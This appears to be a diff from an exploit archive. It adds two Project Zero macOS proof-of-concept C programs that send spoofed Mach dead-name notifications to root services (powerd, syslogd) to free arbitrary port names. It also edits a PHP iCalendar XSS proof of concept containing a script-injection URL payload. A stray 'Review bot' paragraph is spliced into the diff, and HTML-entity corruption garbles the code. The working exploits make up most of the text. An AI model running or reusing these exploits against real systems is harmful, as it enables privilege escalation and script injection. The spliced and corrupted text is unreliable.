+ +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) +#endif + +#include +#include +#include + +#include +#include +#include + +char* service_name = "com.apple.PowerManagement.control"; + +struct notification_msg { + mach_msg_header_t not_header; + NDR_record_t NDR; + mach_port_name_t not_port; +}; + +mach_port_t lookup(char* name) { + mach_port_t service_port = MACH_PORT_NULL; + kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port); + if(err != KERN_SUCCESS){ + printf("unable to look up %s\n", name); + return MACH_PORT_NULL; + } + + return service_port; +} + +int main() { + kern_return_t err; + + mach_port_t service_port = lookup(service_name); + + mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy + + printf("%d\n", getpid()); + printf("service port: %x\n", service_port); + + struct notification_msg not = {0}; + + not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + not.not_header.msgh_size = sizeof(struct notification_msg); + not.not_header.msgh_remote_port = service_port; + not.not_header.msgh_local_port = MACH_PORT_NULL; + not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME + + not.NDR = NDR_record; + + not.not_port = target_port; + + // send the fake notification message + err = mach_msg(¬.not_header, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + (mach_msg_size_t)sizeof(struct notification_msg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + printf("fake notification message: %s\n", mach_error_string(err)); + + return 0; +} \ No newline at end of file diff --git a/platforms/multiple/dos/40959.c b/platforms/multiple/dos/40959.c new file mode 100755 index 000000000..e83959a75 --- /dev/null +++ b/platforms/multiple/dos/40959.c 
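Review bot: `main` in 40958.c uses the port returned by `lookup` without checking it; `lookup` reports failure by returning `MACH_PORT_NULL`, so when the service is absent the notification message is still built and sent to a null destination and the only diagnostic is the `mach_msg` error string, which should be guarded with `if (service_port == MACH_PORT_NULL) { return 1; }` right after the lookup. The literal `0110` stored in `msgh_id` is an octal magic number; the trailing comment names `MACH_NOTIFY_DEAD_NAME` and the prose cites `mach/notify.h`, so the named constant belongs there instead (the `#include` lines are blank on this page, so which headers are actually pulled in cannot be confirmed). As rendered here the send call reads `mach_msg(¬.not_header, …)`, which is almost certainly `&not.not_header` with `&not` decoded as an HTML entity during extraction rather than the author's text. The same three points apply to 40959.c, whose `lookup` and `main` repeat this code line for line.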
@@ -0,0 +1,123 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=977 + +syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb +sandbox profile and so reachable from a lot of sandboxed contexts. + +Here's a snippet from its mach message handling loop listening on the service port: + + ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL); + ... + if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME) + { + deadname = (mach_dead_name_notification_t *)request; + dispatch_async(asl_server_queue, ^{ + cancel_session(deadname->not_port); + /* dead name notification includes a dead name right */ + mach_port_deallocate(mach_task_self(), deadname->not_port); + free(request); + }); + +An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an +arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right +but is a mach_port_name_t which is just a controlled integer. + +An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which +the attacker holds a receive right. + +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) +*/ + +// ianbeer + +#if 0 +MacOS/iOS arbitrary port replacement in syslogd + +syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb +sandbox profile and so reachable from a lot of sandboxed contexts. + +Here's a snippet from its mach message handling loop listening on the service port: + + ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL); + ... 
+ if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME) + { + deadname = (mach_dead_name_notification_t *)request; + dispatch_async(asl_server_queue, ^{ + cancel_session(deadname->not_port); + /* dead name notification includes a dead name right */ + mach_port_deallocate(mach_task_self(), deadname->not_port); + free(request); + }); + +An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an +arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right +but is a mach_port_name_t which is just a controlled integer. + +An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which +the attacker holds a receive right. + +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) +#endif + +#include +#include +#include + +#include +#include +#include + +char* service_name = "com.apple.system.logger"; + +struct notification_msg { + mach_msg_header_t not_header; + NDR_record_t NDR; + mach_port_name_t not_port; +}; + +mach_port_t lookup(char* name) { + mach_port_t service_port = MACH_PORT_NULL; + kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port); + if(err != KERN_SUCCESS){ + printf("unable to look up %s\n", name); + return MACH_PORT_NULL; + } + + return service_port; +} + +int main() { + kern_return_t err; + + mach_port_t service_port = lookup(service_name); + + mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy + + printf("%d\n", getpid()); + printf("service port: %x\n", service_port); + + struct notification_msg not = {0}; + + not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + not.not_header.msgh_size = sizeof(struct notification_msg); + not.not_header.msgh_remote_port = service_port; + not.not_header.msgh_local_port = MACH_PORT_NULL; + not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME + + not.NDR = NDR_record; + + not.not_port = target_port; + + // 
send the fake notification message + err = mach_msg(¬.not_header, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + (mach_msg_size_t)sizeof(struct notification_msg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + printf("fake notification message: %s\n", mach_error_string(err)); + + return 0; +} diff --git a/platforms/php/webapps/29370.txt b/platforms/php/webapps/29370.txt index 83e71e3c7..7250ffbdb 100755 --- a/platforms/php/webapps/29370.txt +++ b/platforms/php/webapps/29370.txt @@ -6,6 +6,6 @@ An attacker may leverage these issues to have arbitrary script code execute in t http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work &getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E PHP icalendar XSS in preferences.php PoC

PHP icalendar <= 2.23 rc1 preferences.php XSS Proof Of concept By Lostmon

Modify the target host , by default http://localhost/



cookie_language:
cookie_calendar:
cpath:
cookie_view:
cookie_time:
cookie_startday:
cookie_style:
unset:
set:


\ No newline at end of file diff --git a/platforms/windows/dos/40960.svg b/platforms/windows/dos/40960.svg new file mode 100755 index 000000000..46e60b53b --- /dev/null +++ b/platforms/windows/dos/40960.svg @@ -0,0 +1,786 @@ + + + + + + + \ No newline at end of file